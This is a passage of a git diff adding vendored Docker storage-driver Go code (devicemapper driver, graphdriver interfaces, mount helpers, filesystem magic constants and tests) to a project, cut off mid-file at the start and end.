strconv.ParseBool(val) + if err != nil { + return nil, err + } + case "dm.blocksize": + size, err := units.RAMInBytes(val) + if err != nil { + return nil, err + } + // convert to 512b sectors + devices.thinpBlockSize = uint32(size) >> 9 + case "dm.override_udev_sync_check": + devices.overrideUdevSyncCheck, err = strconv.ParseBool(val) + if err != nil { + return nil, err + } + + case "dm.use_deferred_removal": + enableDeferredRemoval, err = strconv.ParseBool(val) + if err != nil { + return nil, err + } + + case "dm.use_deferred_deletion": + enableDeferredDeletion, err = strconv.ParseBool(val) + if err != nil { + return nil, err + } + + case "dm.min_free_space": + if !strings.HasSuffix(val, "%") { + return nil, fmt.Errorf("devmapper: Option dm.min_free_space requires %% suffix") + } + + valstring := strings.TrimSuffix(val, "%") + minFreeSpacePercent, err := strconv.ParseUint(valstring, 10, 32) + if err != nil { + return nil, err + } + + if minFreeSpacePercent >= 100 { + return nil, fmt.Errorf("devmapper: Invalid value %v for option dm.min_free_space", val) + } + + devices.minFreeSpacePercent = uint32(minFreeSpacePercent) + case "dm.xfs_nospace_max_retries": + _, err := strconv.ParseUint(val, 10, 64) + if err != nil { + return nil, err + } + devices.xfsNospaceRetries = val + default: + return nil, fmt.Errorf("devmapper: Unknown option %s\n", key) + } + } + + // By default, don't do blk discard hack on raw devices, its rarely useful and is expensive + if !foundBlkDiscard && (devices.dataDevice != "" || devices.thinPoolDevice != "") { + devices.doBlkDiscard = false + } + + if err := devices.initDevmapper(doInit); err != nil { + return nil, err + } + + return devices, nil +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/devmapper_doc.go b/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/devmapper_doc.go new file mode 100644 index 0000000000..9ab3e4f864 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/devmapper_doc.go @@ -0,0 +1,106 @@ +package devmapper + +// Definition of struct dm_task and sub structures (from lvm2) +// +// struct dm_ioctl { +// /* +// * The version number is made up of three parts: +// * major - no backward or forward compatibility, +// * minor - only backwards compatible, +// * patch - both backwards and forwards compatible. +// * +// * All clients of the ioctl interface should fill in the +// * version number of the interface that they were +// * compiled with. +// * +// * All recognized ioctl commands (ie. those that don't +// * return -ENOTTY) fill out this field, even if the +// * command failed. +// */ +// uint32_t version[3]; /* in/out */ +// uint32_t data_size; /* total size of data passed in +// * including this struct */ + +// uint32_t data_start; /* offset to start of data +// * relative to start of this struct */ + +// uint32_t target_count; /* in/out */ +// int32_t open_count; /* out */ +// uint32_t flags; /* in/out */ + +// /* +// * event_nr holds either the event number (input and output) or the +// * udev cookie value (input only). +// * The DM_DEV_WAIT ioctl takes an event number as input. +// * The DM_SUSPEND, DM_DEV_REMOVE and DM_DEV_RENAME ioctls +// * use the field as a cookie to return in the DM_COOKIE +// * variable with the uevents they issue. +// * For output, the ioctls return the event number, not the cookie. +// */ +// uint32_t event_nr; /* in/out */ +// uint32_t padding; + +// uint64_t dev; /* in/out */ + +// char name[DM_NAME_LEN]; /* device name */ +// char uuid[DM_UUID_LEN]; /* unique identifier for +// * the block device */ +// char data[7]; /* padding or data */ +// }; + +// struct target { +// uint64_t start; +// uint64_t length; +// char *type; +// char *params; + +// struct target *next; +// }; + +// typedef enum { +// DM_ADD_NODE_ON_RESUME, /* add /dev/mapper node with dmsetup resume */ +// DM_ADD_NODE_ON_CREATE /* add /dev/mapper node with dmsetup create */ +// } dm_add_node_t; + +// struct dm_task { +// int type; +// char *dev_name; +// char *mangled_dev_name; + +// struct target *head, *tail; + +// int read_only; +// uint32_t event_nr; +// int major; +// int minor; +// int allow_default_major_fallback; +// uid_t uid; +// gid_t gid; +// mode_t mode; +// uint32_t read_ahead; +// uint32_t read_ahead_flags; +// union { +// struct dm_ioctl *v4; +// } dmi; +// char *newname; +// char *message; +// char *geometry; +// uint64_t sector; +// int no_flush; +// int no_open_count; +// int skip_lockfs; +// int query_inactive_table; +// int suppress_identical_reload; +// dm_add_node_t add_node; +// uint64_t existing_table_size; +// int cookie_set; +// int new_uuid; +// int secure_data; +// int retry_remove; +// int enable_checks; +// int expected_errno; + +// char *uuid; +// char *mangled_uuid; +// }; +// diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/devmapper_test.go b/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/devmapper_test.go new file mode 100644 index 0000000000..5c2abcefcb --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/devmapper_test.go @@ -0,0 +1,110 @@ +// +build linux + +package devmapper + +import ( + "fmt" + "testing" + "time" + + "github.com/docker/docker/daemon/graphdriver" + "github.com/docker/docker/daemon/graphdriver/graphtest" +) + +func init() { + // Reduce the size the the base fs and loopback for the tests + defaultDataLoopbackSize = 300 * 1024 * 1024 + defaultMetaDataLoopbackSize = 200 * 1024 * 1024 + defaultBaseFsSize = 300 * 1024 * 1024 + defaultUdevSyncOverride = true + if err := graphtest.InitLoopbacks(); err != nil { + panic(err) + } +} + +// This avoids creating a new driver for each test if all tests are run +// Make sure to put new tests between TestDevmapperSetup and TestDevmapperTeardown +func TestDevmapperSetup(t *testing.T) { + graphtest.GetDriver(t, "devicemapper") +} + +func TestDevmapperCreateEmpty(t *testing.T) { + graphtest.DriverTestCreateEmpty(t, "devicemapper") +} + +func TestDevmapperCreateBase(t *testing.T) { + graphtest.DriverTestCreateBase(t, "devicemapper") +} + +func TestDevmapperCreateSnap(t *testing.T) { + graphtest.DriverTestCreateSnap(t, "devicemapper") +} + +func TestDevmapperTeardown(t *testing.T) { + graphtest.PutDriver(t) +} + +func TestDevmapperReduceLoopBackSize(t *testing.T) { + tenMB := int64(10 * 1024 * 1024) + testChangeLoopBackSize(t, -tenMB, defaultDataLoopbackSize, defaultMetaDataLoopbackSize) +} + +func TestDevmapperIncreaseLoopBackSize(t *testing.T) { + tenMB := int64(10 * 1024 * 1024) + testChangeLoopBackSize(t, tenMB, defaultDataLoopbackSize+tenMB, defaultMetaDataLoopbackSize+tenMB) +} + +func testChangeLoopBackSize(t *testing.T, delta, expectDataSize, expectMetaDataSize int64) { + driver := graphtest.GetDriver(t, "devicemapper").(*graphtest.Driver).Driver.(*graphdriver.NaiveDiffDriver).ProtoDriver.(*Driver) + defer graphtest.PutDriver(t) + // make sure data or metadata loopback size are the default size + if s := driver.DeviceSet.Status(); s.Data.Total != uint64(defaultDataLoopbackSize) || s.Metadata.Total != uint64(defaultMetaDataLoopbackSize) { + t.Fatalf("data or metadata loop back size is incorrect") + } + if err := driver.Cleanup(); err != nil { + t.Fatal(err) + } + //Reload + d, err := Init(driver.home, []string{ + fmt.Sprintf("dm.loopdatasize=%d", defaultDataLoopbackSize+delta), + fmt.Sprintf("dm.loopmetadatasize=%d", defaultMetaDataLoopbackSize+delta), + }, nil, nil) + if err != nil { + t.Fatalf("error creating devicemapper driver: %v", err) + } + driver = d.(*graphdriver.NaiveDiffDriver).ProtoDriver.(*Driver) + if s := driver.DeviceSet.Status(); s.Data.Total != uint64(expectDataSize) || s.Metadata.Total != uint64(expectMetaDataSize) { + t.Fatalf("data or metadata loop back size is incorrect") + } + if err := driver.Cleanup(); err != nil { + t.Fatal(err) + } +} + +// Make sure devices.Lock() has been release upon return from cleanupDeletedDevices() function +func TestDevmapperLockReleasedDeviceDeletion(t *testing.T) { + driver := graphtest.GetDriver(t, "devicemapper").(*graphtest.Driver).Driver.(*graphdriver.NaiveDiffDriver).ProtoDriver.(*Driver) + defer graphtest.PutDriver(t) + + // Call cleanupDeletedDevices() and after the call take and release + // DeviceSet Lock. If lock has not been released, this will hang. + driver.DeviceSet.cleanupDeletedDevices() + + doneChan := make(chan bool) + + go func() { + driver.DeviceSet.Lock() + defer driver.DeviceSet.Unlock() + doneChan <- true + }() + + select { + case <-time.After(time.Second * 5): + // Timer expired. That means lock was not released upon + // function return and we are deadlocked. Release lock + // here so that cleanup could succeed and fail the test. + driver.DeviceSet.Unlock() + t.Fatalf("Could not acquire devices lock after call to cleanupDeletedDevices()") + case <-doneChan: + } +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/driver.go b/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/driver.go new file mode 100644 index 0000000000..7cf422ce6a --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/driver.go @@ -0,0 +1,231 @@ +// +build linux + +package devmapper + +import ( + "fmt" + "io/ioutil" + "os" + "path" + "strconv" + + "github.com/Sirupsen/logrus" + + "github.com/docker/docker/daemon/graphdriver" + "github.com/docker/docker/pkg/devicemapper" + "github.com/docker/docker/pkg/idtools" + "github.com/docker/docker/pkg/mount" + "github.com/docker/go-units" +) + +func init() { + graphdriver.Register("devicemapper", Init) +} + +// Driver contains the device set mounted and the home directory +type Driver struct { + *DeviceSet + home string + uidMaps []idtools.IDMap + gidMaps []idtools.IDMap + ctr *graphdriver.RefCounter +} + +// Init creates a driver with the given home and the set of options. +func Init(home string, options []string, uidMaps, gidMaps []idtools.IDMap) (graphdriver.Driver, error) { + deviceSet, err := NewDeviceSet(home, true, options, uidMaps, gidMaps) + if err != nil { + return nil, err + } + + if err := mount.MakePrivate(home); err != nil { + return nil, err + } + + d := &Driver{ + DeviceSet: deviceSet, + home: home, + uidMaps: uidMaps, + gidMaps: gidMaps, + ctr: graphdriver.NewRefCounter(graphdriver.NewDefaultChecker()), + } + + return graphdriver.NewNaiveDiffDriver(d, uidMaps, gidMaps), nil +} + +func (d *Driver) String() string { + return "devicemapper" +} + +// Status returns the status about the driver in a printable format. +// Information returned contains Pool Name, Data File, Metadata file, disk usage by +// the data and metadata, etc. +func (d *Driver) Status() [][2]string { + s := d.DeviceSet.Status() + + status := [][2]string{ + {"Pool Name", s.PoolName}, + {"Pool Blocksize", fmt.Sprintf("%s", units.HumanSize(float64(s.SectorSize)))}, + {"Base Device Size", fmt.Sprintf("%s", units.HumanSize(float64(s.BaseDeviceSize)))}, + {"Backing Filesystem", s.BaseDeviceFS}, + {"Data file", s.DataFile}, + {"Metadata file", s.MetadataFile}, + {"Data Space Used", fmt.Sprintf("%s", units.HumanSize(float64(s.Data.Used)))}, + {"Data Space Total", fmt.Sprintf("%s", units.HumanSize(float64(s.Data.Total)))}, + {"Data Space Available", fmt.Sprintf("%s", units.HumanSize(float64(s.Data.Available)))}, + {"Metadata Space Used", fmt.Sprintf("%s", units.HumanSize(float64(s.Metadata.Used)))}, + {"Metadata Space Total", fmt.Sprintf("%s", units.HumanSize(float64(s.Metadata.Total)))}, + {"Metadata Space Available", fmt.Sprintf("%s", units.HumanSize(float64(s.Metadata.Available)))}, + {"Thin Pool Minimum Free Space", fmt.Sprintf("%s", units.HumanSize(float64(s.MinFreeSpace)))}, + {"Udev Sync Supported", fmt.Sprintf("%v", s.UdevSyncSupported)}, + {"Deferred Removal Enabled", fmt.Sprintf("%v", s.DeferredRemoveEnabled)}, + {"Deferred Deletion Enabled", fmt.Sprintf("%v", s.DeferredDeleteEnabled)}, + {"Deferred Deleted Device Count", fmt.Sprintf("%v", s.DeferredDeletedDeviceCount)}, + } + if len(s.DataLoopback) > 0 { + status = append(status, [2]string{"Data loop file", s.DataLoopback}) + } + if len(s.MetadataLoopback) > 0 { + status = append(status, [2]string{"Metadata loop file", s.MetadataLoopback}) + } + if vStr, err := devicemapper.GetLibraryVersion(); err == nil { + status = append(status, [2]string{"Library Version", vStr}) + } + return status +} + +// GetMetadata returns a map of information about the device. +func (d *Driver) GetMetadata(id string) (map[string]string, error) { + m, err := d.DeviceSet.exportDeviceMetadata(id) + + if err != nil { + return nil, err + } + + metadata := make(map[string]string) + metadata["DeviceId"] = strconv.Itoa(m.deviceID) + metadata["DeviceSize"] = strconv.FormatUint(m.deviceSize, 10) + metadata["DeviceName"] = m.deviceName + return metadata, nil +} + +// Cleanup unmounts a device. +func (d *Driver) Cleanup() error { + err := d.DeviceSet.Shutdown(d.home) + + if err2 := mount.Unmount(d.home); err == nil { + err = err2 + } + + return err +} + +// CreateReadWrite creates a layer that is writable for use as a container +// file system. +func (d *Driver) CreateReadWrite(id, parent string, opts *graphdriver.CreateOpts) error { + return d.Create(id, parent, opts) +} + +// Create adds a device with a given id and the parent. +func (d *Driver) Create(id, parent string, opts *graphdriver.CreateOpts) error { + var storageOpt map[string]string + if opts != nil { + storageOpt = opts.StorageOpt + } + + if err := d.DeviceSet.AddDevice(id, parent, storageOpt); err != nil { + return err + } + + return nil +} + +// Remove removes a device with a given id, unmounts the filesystem. +func (d *Driver) Remove(id string) error { + if !d.DeviceSet.HasDevice(id) { + // Consider removing a non-existing device a no-op + // This is useful to be able to progress on container removal + // if the underlying device has gone away due to earlier errors + return nil + } + + // This assumes the device has been properly Get/Put:ed and thus is unmounted + if err := d.DeviceSet.DeleteDevice(id, false); err != nil { + return err + } + + mp := path.Join(d.home, "mnt", id) + if err := os.RemoveAll(mp); err != nil && !os.IsNotExist(err) { + return err + } + + return nil +} + +// Get mounts a device with given id into the root filesystem +func (d *Driver) Get(id, mountLabel string) (string, error) { + mp := path.Join(d.home, "mnt", id) + rootFs := path.Join(mp, "rootfs") + if count := d.ctr.Increment(mp); count > 1 { + return rootFs, nil + } + + uid, gid, err := idtools.GetRootUIDGID(d.uidMaps, d.gidMaps) + if err != nil { + d.ctr.Decrement(mp) + return "", err + } + + // Create the target directories if they don't exist + if err := idtools.MkdirAllAs(path.Join(d.home, "mnt"), 0755, uid, gid); err != nil && !os.IsExist(err) { + d.ctr.Decrement(mp) + return "", err + } + if err := idtools.MkdirAs(mp, 0755, uid, gid); err != nil && !os.IsExist(err) { + d.ctr.Decrement(mp) + return "", err + } + + // Mount the device + if err := d.DeviceSet.MountDevice(id, mp, mountLabel); err != nil { + d.ctr.Decrement(mp) + return "", err + } + + if err := idtools.MkdirAllAs(rootFs, 0755, uid, gid); err != nil && !os.IsExist(err) { + d.ctr.Decrement(mp) + d.DeviceSet.UnmountDevice(id, mp) + return "", err + } + + idFile := path.Join(mp, "id") + if _, err := os.Stat(idFile); err != nil && os.IsNotExist(err) { + // Create an "id" file with the container/image id in it to help reconstruct this in case + // of later problems + if err := ioutil.WriteFile(idFile, []byte(id), 0600); err != nil { + d.ctr.Decrement(mp) + d.DeviceSet.UnmountDevice(id, mp) + return "", err + } + } + + return rootFs, nil +} + +// Put unmounts a device and removes it. +func (d *Driver) Put(id string) error { + mp := path.Join(d.home, "mnt", id) + if count := d.ctr.Decrement(mp); count > 0 { + return nil + } + err := d.DeviceSet.UnmountDevice(id, mp) + if err != nil { + logrus.Errorf("devmapper: Error unmounting device %s: %s", id, err) + } + return err +} + +// Exists checks to see if the device exists. +func (d *Driver) Exists(id string) bool { + return d.DeviceSet.HasDevice(id) +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/mount.go b/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/mount.go new file mode 100644 index 0000000000..cca1fe1b38 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/mount.go @@ -0,0 +1,89 @@ +// +build linux + +package devmapper + +import ( + "bytes" + "fmt" + "os" + "path/filepath" + "syscall" +) + +// FIXME: this is copy-pasted from the aufs driver. +// It should be moved into the core. + +// Mounted returns true if a mount point exists. +func Mounted(mountpoint string) (bool, error) { + mntpoint, err := os.Stat(mountpoint) + if err != nil { + if os.IsNotExist(err) { + return false, nil + } + return false, err + } + parent, err := os.Stat(filepath.Join(mountpoint, "..")) + if err != nil { + return false, err + } + mntpointSt := mntpoint.Sys().(*syscall.Stat_t) + parentSt := parent.Sys().(*syscall.Stat_t) + return mntpointSt.Dev != parentSt.Dev, nil +} + +type probeData struct { + fsName string + magic string + offset uint64 +} + +// ProbeFsType returns the filesystem name for the given device id. +func ProbeFsType(device string) (string, error) { + probes := []probeData{ + {"btrfs", "_BHRfS_M", 0x10040}, + {"ext4", "\123\357", 0x438}, + {"xfs", "XFSB", 0}, + } + + maxLen := uint64(0) + for _, p := range probes { + l := p.offset + uint64(len(p.magic)) + if l > maxLen { + maxLen = l + } + } + + file, err := os.Open(device) + if err != nil { + return "", err + } + defer file.Close() + + buffer := make([]byte, maxLen) + l, err := file.Read(buffer) + if err != nil { + return "", err + } + + if uint64(l) != maxLen { + return "", fmt.Errorf("devmapper: unable to detect filesystem type of %s, short read", device) + } + + for _, p := range probes { + if bytes.Equal([]byte(p.magic), buffer[p.offset:p.offset+uint64(len(p.magic))]) { + return p.fsName, nil + } + } + + return "", fmt.Errorf("devmapper: Unknown filesystem type on %s", device) +} + +func joinMountOptions(a, b string) string { + if a == "" { + return b + } + if b == "" { + return a + } + return a + "," + b +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/driver.go b/vendor/github.com/docker/docker/daemon/graphdriver/driver.go new file mode 100644 index 0000000000..f0bce562b7 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/driver.go @@ -0,0 +1,270 @@ +package graphdriver + +import ( + "errors" + "fmt" + "io" + "os" + "path/filepath" + "strings" + + "github.com/Sirupsen/logrus" + "github.com/vbatts/tar-split/tar/storage" + + "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/idtools" + "github.com/docker/docker/pkg/plugingetter" +) + +// FsMagic unsigned id of the filesystem in use. +type FsMagic uint32 + +const ( + // FsMagicUnsupported is a predefined constant value other than a valid filesystem id. + FsMagicUnsupported = FsMagic(0x00000000) +) + +var ( + // All registered drivers + drivers map[string]InitFunc + + // ErrNotSupported returned when driver is not supported. + ErrNotSupported = errors.New("driver not supported") + // ErrPrerequisites retuned when driver does not meet prerequisites. + ErrPrerequisites = errors.New("prerequisites for driver not satisfied (wrong filesystem?)") + // ErrIncompatibleFS returned when file system is not supported. + ErrIncompatibleFS = fmt.Errorf("backing file system is unsupported for this graph driver") +) + +//CreateOpts contains optional arguments for Create() and CreateReadWrite() +// methods. +type CreateOpts struct { + MountLabel string + StorageOpt map[string]string +} + +// InitFunc initializes the storage driver. +type InitFunc func(root string, options []string, uidMaps, gidMaps []idtools.IDMap) (Driver, error) + +// ProtoDriver defines the basic capabilities of a driver. +// This interface exists solely to be a minimum set of methods +// for client code which choose not to implement the entire Driver +// interface and use the NaiveDiffDriver wrapper constructor. +// +// Use of ProtoDriver directly by client code is not recommended. +type ProtoDriver interface { + // String returns a string representation of this driver. + String() string + // CreateReadWrite creates a new, empty filesystem layer that is ready + // to be used as the storage for a container. Additional options can + // be passed in opts. parent may be "" and opts may be nil. + CreateReadWrite(id, parent string, opts *CreateOpts) error + // Create creates a new, empty, filesystem layer with the + // specified id and parent and options passed in opts. Parent + // may be "" and opts may be nil. + Create(id, parent string, opts *CreateOpts) error + // Remove attempts to remove the filesystem layer with this id. + Remove(id string) error + // Get returns the mountpoint for the layered filesystem referred + // to by this id. You can optionally specify a mountLabel or "". + // Returns the absolute path to the mounted layered filesystem. + Get(id, mountLabel string) (dir string, err error) + // Put releases the system resources for the specified id, + // e.g, unmounting layered filesystem. + Put(id string) error + // Exists returns whether a filesystem layer with the specified + // ID exists on this driver. + Exists(id string) bool + // Status returns a set of key-value pairs which give low + // level diagnostic status about this driver. + Status() [][2]string + // Returns a set of key-value pairs which give low level information + // about the image/container driver is managing. + GetMetadata(id string) (map[string]string, error) + // Cleanup performs necessary tasks to release resources + // held by the driver, e.g., unmounting all layered filesystems + // known to this driver. + Cleanup() error +} + +// DiffDriver is the interface to use to implement graph diffs +type DiffDriver interface { + // Diff produces an archive of the changes between the specified + // layer and its parent layer which may be "". + Diff(id, parent string) (io.ReadCloser, error) + // Changes produces a list of changes between the specified layer + // and its parent layer. If parent is "", then all changes will be ADD changes. + Changes(id, parent string) ([]archive.Change, error) + // ApplyDiff extracts the changeset from the given diff into the + // layer with the specified id and parent, returning the size of the + // new layer in bytes. + // The archive.Reader must be an uncompressed stream. + ApplyDiff(id, parent string, diff io.Reader) (size int64, err error) + // DiffSize calculates the changes between the specified id + // and its parent and returns the size in bytes of the changes + // relative to its base filesystem directory. + DiffSize(id, parent string) (size int64, err error) +} + +// Driver is the interface for layered/snapshot file system drivers. +type Driver interface { + ProtoDriver + DiffDriver +} + +// DiffGetterDriver is the interface for layered file system drivers that +// provide a specialized function for getting file contents for tar-split. +type DiffGetterDriver interface { + Driver + // DiffGetter returns an interface to efficiently retrieve the contents + // of files in a layer. + DiffGetter(id string) (FileGetCloser, error) +} + +// FileGetCloser extends the storage.FileGetter interface with a Close method +// for cleaning up. +type FileGetCloser interface { + storage.FileGetter + // Close cleans up any resources associated with the FileGetCloser. + Close() error +} + +// Checker makes checks on specified filesystems. +type Checker interface { + // IsMounted returns true if the provided path is mounted for the specific checker + IsMounted(path string) bool +} + +func init() { + drivers = make(map[string]InitFunc) +} + +// Register registers an InitFunc for the driver. +func Register(name string, initFunc InitFunc) error { + if _, exists := drivers[name]; exists { + return fmt.Errorf("Name already registered %s", name) + } + drivers[name] = initFunc + + return nil +} + +// GetDriver initializes and returns the registered driver +func GetDriver(name string, pg plugingetter.PluginGetter, config Options) (Driver, error) { + if initFunc, exists := drivers[name]; exists { + return initFunc(filepath.Join(config.Root, name), config.DriverOptions, config.UIDMaps, config.GIDMaps) + } + + pluginDriver, err := lookupPlugin(name, pg, config) + if err == nil { + return pluginDriver, nil + } + logrus.WithError(err).WithField("driver", name).WithField("home-dir", config.Root).Error("Failed to GetDriver graph") + return nil, ErrNotSupported +} + +// getBuiltinDriver initializes and returns the registered driver, but does not try to load from plugins +func getBuiltinDriver(name, home string, options []string, uidMaps, gidMaps []idtools.IDMap) (Driver, error) { + if initFunc, exists := drivers[name]; exists { + return initFunc(filepath.Join(home, name), options, uidMaps, gidMaps) + } + logrus.Errorf("Failed to built-in GetDriver graph %s %s", name, home) + return nil, ErrNotSupported +} + +// Options is used to initialize a graphdriver +type Options struct { + Root string + DriverOptions []string + UIDMaps []idtools.IDMap + GIDMaps []idtools.IDMap + ExperimentalEnabled bool +} + +// New creates the driver and initializes it at the specified root. +func New(name string, pg plugingetter.PluginGetter, config Options) (Driver, error) { + if name != "" { + logrus.Debugf("[graphdriver] trying provided driver: %s", name) // so the logs show specified driver + return GetDriver(name, pg, config) + } + + // Guess for prior driver + driversMap := scanPriorDrivers(config.Root) + for _, name := range priority { + if name == "vfs" { + // don't use vfs even if there is state present. + continue + } + if _, prior := driversMap[name]; prior { + // of the state found from prior drivers, check in order of our priority + // which we would prefer + driver, err := getBuiltinDriver(name, config.Root, config.DriverOptions, config.UIDMaps, config.GIDMaps) + if err != nil { + // unlike below, we will return error here, because there is prior + // state, and now it is no longer supported/prereq/compatible, so + // something changed and needs attention. Otherwise the daemon's + // images would just "disappear". + logrus.Errorf("[graphdriver] prior storage driver %s failed: %s", name, err) + return nil, err + } + + // abort starting when there are other prior configured drivers + // to ensure the user explicitly selects the driver to load + if len(driversMap)-1 > 0 { + var driversSlice []string + for name := range driversMap { + driversSlice = append(driversSlice, name) + } + + return nil, fmt.Errorf("%s contains several valid graphdrivers: %s; Please cleanup or explicitly choose storage driver (-s )", config.Root, strings.Join(driversSlice, ", ")) + } + + logrus.Infof("[graphdriver] using prior storage driver: %s", name) + return driver, nil + } + } + + // Check for priority drivers first + for _, name := range priority { + driver, err := getBuiltinDriver(name, config.Root, config.DriverOptions, config.UIDMaps, config.GIDMaps) + if err != nil { + if isDriverNotSupported(err) { + continue + } + return nil, err + } + return driver, nil + } + + // Check all registered drivers if no priority driver is found + for name, initFunc := range drivers { + driver, err := initFunc(filepath.Join(config.Root, name), config.DriverOptions, config.UIDMaps, config.GIDMaps) + if err != nil { + if isDriverNotSupported(err) { + continue + } + return nil, err + } + return driver, nil + } + return nil, fmt.Errorf("No supported storage backend found") +} + +// isDriverNotSupported returns true if the error initializing +// the graph driver is a non-supported error. +func isDriverNotSupported(err error) bool { + return err == ErrNotSupported || err == ErrPrerequisites || err == ErrIncompatibleFS +} + +// scanPriorDrivers returns an un-ordered scan of directories of prior storage drivers +func scanPriorDrivers(root string) map[string]bool { + driversMap := make(map[string]bool) + + for driver := range drivers { + p := filepath.Join(root, driver) + if _, err := os.Stat(p); err == nil && driver != "vfs" { + driversMap[driver] = true + } + } + return driversMap +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/driver_freebsd.go b/vendor/github.com/docker/docker/daemon/graphdriver/driver_freebsd.go new file mode 100644 index 0000000000..2891a84f3a --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/driver_freebsd.go @@ -0,0 +1,19 @@ +package graphdriver + +import "syscall" + +var ( + // Slice of drivers that should be used in an order + priority = []string{ + "zfs", + } +) + +// Mounted checks if the given path is mounted as the fs type +func Mounted(fsType FsMagic, mountPath string) (bool, error) { + var buf syscall.Statfs_t + if err := syscall.Statfs(mountPath, &buf); err != nil { + return false, err + } + return FsMagic(buf.Type) == fsType, nil +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/driver_linux.go b/vendor/github.com/docker/docker/daemon/graphdriver/driver_linux.go new file mode 100644 index 0000000000..5c8d0e2301 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/driver_linux.go @@ -0,0 +1,135 @@ +// +build linux + +package graphdriver + +import ( + "path/filepath" + "syscall" + + "github.com/docker/docker/pkg/mount" +) + +const ( + // FsMagicAufs filesystem id for Aufs + FsMagicAufs = FsMagic(0x61756673) + // FsMagicBtrfs filesystem id for Btrfs + FsMagicBtrfs = FsMagic(0x9123683E) + // FsMagicCramfs filesystem id for Cramfs + FsMagicCramfs = FsMagic(0x28cd3d45) + // FsMagicEcryptfs filesystem id for eCryptfs + FsMagicEcryptfs = FsMagic(0xf15f) + // FsMagicExtfs filesystem id for Extfs + FsMagicExtfs = FsMagic(0x0000EF53) + // FsMagicF2fs filesystem id for F2fs + FsMagicF2fs = FsMagic(0xF2F52010) + // FsMagicGPFS filesystem id for GPFS + FsMagicGPFS = FsMagic(0x47504653) + // FsMagicJffs2Fs filesystem if for Jffs2Fs + FsMagicJffs2Fs = FsMagic(0x000072b6) + // FsMagicJfs filesystem id for Jfs + FsMagicJfs = FsMagic(0x3153464a) + // FsMagicNfsFs filesystem id for NfsFs + FsMagicNfsFs = FsMagic(0x00006969) + // FsMagicRAMFs filesystem id for RamFs + FsMagicRAMFs = FsMagic(0x858458f6) + // FsMagicReiserFs filesystem id for ReiserFs + FsMagicReiserFs = FsMagic(0x52654973) + // FsMagicSmbFs filesystem id for SmbFs + FsMagicSmbFs = FsMagic(0x0000517B) + // FsMagicSquashFs filesystem id for SquashFs + FsMagicSquashFs = FsMagic(0x73717368) + // FsMagicTmpFs filesystem id for TmpFs + FsMagicTmpFs = FsMagic(0x01021994) + // FsMagicVxFS filesystem id for VxFs + FsMagicVxFS = FsMagic(0xa501fcf5) + // FsMagicXfs filesystem id for Xfs + FsMagicXfs = FsMagic(0x58465342) + // FsMagicZfs filesystem id for Zfs + FsMagicZfs = FsMagic(0x2fc12fc1) + // FsMagicOverlay filesystem id for overlay + FsMagicOverlay = FsMagic(0x794C7630) +) + +var ( + // Slice of drivers that should be used in an order + priority = []string{ + "aufs", + "btrfs", + "zfs", + "overlay2", + "overlay", + "devicemapper", + "vfs", + } + + // FsNames maps filesystem id to name of the filesystem. + FsNames = map[FsMagic]string{ + FsMagicAufs: "aufs", + FsMagicBtrfs: "btrfs", + FsMagicCramfs: "cramfs", + FsMagicExtfs: "extfs", + FsMagicF2fs: "f2fs", + FsMagicGPFS: "gpfs", + FsMagicJffs2Fs: "jffs2", + FsMagicJfs: "jfs", + FsMagicNfsFs: "nfs", + FsMagicOverlay: "overlayfs", + FsMagicRAMFs: "ramfs", + FsMagicReiserFs: "reiserfs", + FsMagicSmbFs: "smb", + FsMagicSquashFs: "squashfs", + FsMagicTmpFs: "tmpfs", + FsMagicUnsupported: "unsupported", + FsMagicVxFS: "vxfs", + FsMagicXfs: "xfs", + FsMagicZfs: "zfs", + } +) + +// GetFSMagic returns the filesystem id given the path. +func GetFSMagic(rootpath string) (FsMagic, error) { + var buf syscall.Statfs_t + if err := syscall.Statfs(filepath.Dir(rootpath), &buf); err != nil { + return 0, err + } + return FsMagic(buf.Type), nil +} + +// NewFsChecker returns a checker configured for the provied FsMagic +func NewFsChecker(t FsMagic) Checker { + return &fsChecker{ + t: t, + } +} + +type fsChecker struct { + t FsMagic +} + +func (c *fsChecker) IsMounted(path string) bool { + m, _ := Mounted(c.t, path) + return m +} + +// NewDefaultChecker returns a check that parses /proc/mountinfo to check +// if the specified path is mounted. +func NewDefaultChecker() Checker { + return &defaultChecker{} +} + +type defaultChecker struct { +} + +func (c *defaultChecker) IsMounted(path string) bool { + m, _ := mount.Mounted(path) + return m +} + +// Mounted checks if the given path is mounted as the fs type +func Mounted(fsType FsMagic, mountPath string) (bool, error) { + var buf syscall.Statfs_t + if err := syscall.Statfs(mountPath, &buf); err != nil { + return false, err + } + return FsMagic(buf.Type) == fsType, nil +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/driver_solaris.go b/vendor/github.com/docker/docker/daemon/graphdriver/driver_solaris.go new file mode 100644 index 0000000000..7daf01c32d --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/driver_solaris.go @@ -0,0 +1,97 @@ +// +build solaris,cgo + +package graphdriver + +/* +#include +#include + +static inline struct statvfs *getstatfs(char *s) { + struct statvfs *buf; + int err; + buf = (struct statvfs *)malloc(sizeof(struct statvfs)); + err = statvfs(s, buf); + return buf; +} +*/ +import "C" +import ( + "path/filepath" + "unsafe" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/pkg/mount" +) + +const ( + // FsMagicZfs filesystem id for Zfs + FsMagicZfs = FsMagic(0x2fc12fc1) +) + +var ( + // Slice of drivers that should be used in an order + priority = []string{ + "zfs", + } + + // FsNames maps filesystem id to name of the 